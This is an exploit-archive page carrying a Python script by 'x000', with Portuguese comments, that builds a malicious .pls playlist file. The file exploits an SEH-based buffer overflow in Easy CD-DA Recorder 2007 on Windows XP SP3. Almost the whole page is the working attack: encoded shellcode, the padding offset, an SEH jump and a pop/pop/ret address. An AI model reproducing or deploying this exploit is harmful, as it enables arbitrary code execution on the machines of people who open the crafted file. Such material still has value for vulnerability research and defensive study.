Easy CD-DA Recorder Buffer Overflow Exploit (SEH)

2011-02-23 14:15:50

#!/usr/bin/python
#
#[+]Exploit Title: Exploit Buffer Overflow Easy CD-DA Recorder(SEH)
#[+]Date: 02\22\2011
#[+]Author: x000
#[+]Software Link: http://download.cnet.com/Easy-CD-DA-Recorder/3000-2646_4-10059726.html
#[+]Version: 2007 Version:
#[+]Tested on: WIN-XP SP3 Brazilian Portuguese
#[+]Cve: N/A
#[+]Language: Portuguese
#
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxx
# xxxxx xxx xxx xxx xxx xxx xxx xxxxx
# xxx xxx xxx xxx xxx xxx xxx xxxxxxx xxxxxxxx xxxxxxxxx
# xxxxxx xxx xxx xxx xxx xxx xxx xx xx xx xx xx
# xxx xxx xxx xxx xxx xxx xxx xxx xx xx xx xxxx xx xxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxx xxxxxxx xx xx xx xx
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx xxx xxxxxx xx xx xxxxxxxxx
#
#
#ESCRITO EM PYTHON SO PRA LEMBRAR
#
#Criado por x000
#E-mail [email protected]
#Site www.x000.org/
#
#Link de Download: http://download.cnet.com/Easy-CD-DA-Recorder/3000-2646_4-10059726.html
#
#
#

import time
import struct
import os
import sys

if os.name == 'nt':
os.system("cls")
os.system("color 4f")
else:
os.system("clear")



def usage():
print """
=======================================================
=======================================================
==========Exploit Buffer Overflow Easy CD-DA Recorder==
==========Author x000==================================
==========E-mail [email protected]==================
==========Site www.x000.org/===========================
=======================================================
=======================================================
"""



if len(sys.argv)!=2:
usage()
print "\t\t[-]Modo de Uso: python %s <Nome do Arquivo>" % sys.argv[0]
print "\t\t[-]Exemplo: python %s exploit.pls" % sys.argv[0]
sys.exit(0)

usage()

print "\t\t[+]Idendificando o Tamanho do Shellcode\n"
time.sleep(1)
buffer = ("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYKO0FQHIOOCL4VBPHLXYC"
"DFDL4NQ5NV8VQBXR8MSM8KLUSCHU8ZTMUP03HOL3UXID8NVQ3JUJSNTNNSM5RNJGJ6RELOOBBZM5MF4X"
"U56GYGQM7Z63PZURQ8JTFP5L5R49WSLKKEKC5RKL0Q7IM1XKMVBP85KORM8XCZW7KSJHO0LPO7SN30SY"
"4F7JWN87KMSLNMSUOPWPSSTF1OQWCHML5IVL59QCNLXJUNJJQ35OXGVLYWMGKIPXYKNPQ51NVTNVOK5U"
"IMW873HFOPYJ0SKYGUU3OKXSKXJA")

print "\t\t[+]Tamaho do Shellcode:"+str(len(buffer))+"\n"
time.sleep(1)

buffer += "\x41" * (1108-len(buffer))
buffer += "\xeb\x06\x90\x90"
buffer += struct.pack('<L',0x100752C9)#P/P/Ret
buffer += "\x90" * 24#24 nops
buffer += "\x61\x61\x61\x52\x58\x50\xc3"
buffer += "\x41" * 10000

print "\t\t[+]Criando Arquivo "+sys.argv[1]+"...\n"
time.sleep(1)
try:
FILE = open(sys.argv[1],"w")
FILE.write(buffer)
FILE.close()
print "\t\t[+]Pronto Arquivo Criado Som Sucesso";
time.sleep(1)
except:
print "\t\t[+]Erro ao Criar Arquivo "+sys.argv[0]

Fixes

No fixes

In order to submit a new fix you need to be registered.